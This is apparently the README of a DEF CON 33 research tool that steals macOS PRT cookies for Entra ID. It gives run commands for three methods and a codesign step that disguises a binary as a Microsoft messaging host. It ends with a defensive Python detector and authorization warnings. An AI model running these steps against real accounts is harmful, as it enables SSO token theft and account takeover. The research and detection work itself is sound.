The research findings of this project were presented at DEF CON 33.
- Title: Original Sin of SSO: macOS PRT Cookie Theft & Entra ID Persistence via Device Forgery
- Speakers:
  - John Jiang (@SeucrityThunder)
  - Kazma Ye (@kazma_tw)
  - Echo Lee (@iflywithoutwind)
This method uses a headless browser to simulate a Single Sign-On (SSO) process and acquire PRT cookies.

```sh
pip3 install -r requirements.txt
python auto.py
```

This approach packages a spoofed Chrome application to trigger BrowserCore, deceive it into completing the SSO flow, and obtain PRT cookies.

Replace YOUR_NONCE_HERE with the SSO nonce you intercepted from your browser.

```sh
./MacPRThief.sh YOUR_NONCE_HERE
```

If you don't need or cannot obtain an sso_nonce, you can also run it directly:

```sh
./MacPRThief.sh
```

The obtained PRT token will be displayed directly in the terminal.

DirectSSOCall directly calls macOS's SSO Extension to request a PRT cookie.

```sh
clang++ -framework Foundation -framework AuthenticationServices -fobjc-arc -o macprt_directcall main.mm
```

To allow macprt_directcall to be trusted by the system and communicate with WAM (Web Account Manager), it needs to be signed. Here, we're disguising it as a legitimate Microsoft browser messaging host.

```sh
codesign --force --deep --sign - --identifier "microsoft.com.browserMessagingHost" ./macprt_directcall
```

After signing, you can execute ./macprt_directcall to retrieve the PRT.
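From the defender's side, the `--sign -` step above leaves a tell: the binary carries a Microsoft-looking identifier but an ad-hoc signature with no Team ID, which a real vendor build would never have. The following is an added detection example, not part of this project; it parses `codesign -dvv` style output (note that `codesign` writes this report to stderr) and flags that mismatch. The two sample reports are constructed, and the vendor team ID in the second one is a placeholder.

```python
# Constructed sample of `codesign -dvv` output for a binary signed with
# `codesign --sign -` (ad-hoc) but claiming a Microsoft identifier.
SAMPLE_ADHOC = """Executable=/tmp/macprt_directcall
Identifier=microsoft.com.browserMessagingHost
Format=Mach-O thin (arm64)
CodeDirectory v=20400 size=512 flags=0x2(adhoc) hashes=12+2 location=embedded
Signature=adhoc
Info.plist=not bound
TeamIdentifier=not set
Sealed Resources=none
"""

# Constructed sample of a properly Developer-ID-signed vendor binary.
# PLACEHOLDERTEAM stands in for the vendor's real Team ID.
SAMPLE_SIGNED = """Executable=/Applications/Vendor.app/Contents/MacOS/Vendor
Identifier=com.example.vendor.host
Format=app bundle with Mach-O universal (x86_64 arm64)
Signature size=9000
Authority=Developer ID Application: Example Vendor (PLACEHOLDERTEAM)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=PLACEHOLDERTEAM
"""


def parse_codesign(output):
    """Turn `key=value` report lines into {key: [values]} (keys may repeat)."""
    fields = {}
    for line in output.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            fields.setdefault(key.strip(), []).append(value.strip())
    return fields


def is_suspicious(output, vendor_markers=("microsoft",)):
    """True when the identifier claims a vendor but the signature is ad-hoc
    (Signature=adhoc) or carries no Team ID, as `codesign --sign -` produces."""
    fields = parse_codesign(output)
    identifier = fields.get("Identifier", [""])[0].lower()
    claims_vendor = any(marker in identifier for marker in vendor_markers)
    adhoc = "adhoc" in fields.get("Signature", [])
    no_team = fields.get("TeamIdentifier", ["not set"])[0] == "not set"
    return claims_vendor and (adhoc or no_team)
```

Run this over `codesign -dvv` reports collected from native messaging hosts and other binaries that talk to WAM, and alert on any hit.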
This tool is intended solely for academic research and red team exercises.
- ⚠️ DO NOT use this on machines, tenants, or accounts you do not own or have explicit authorization for.
- ⚠️ DO NOT use this in production or enterprise environments without authorization.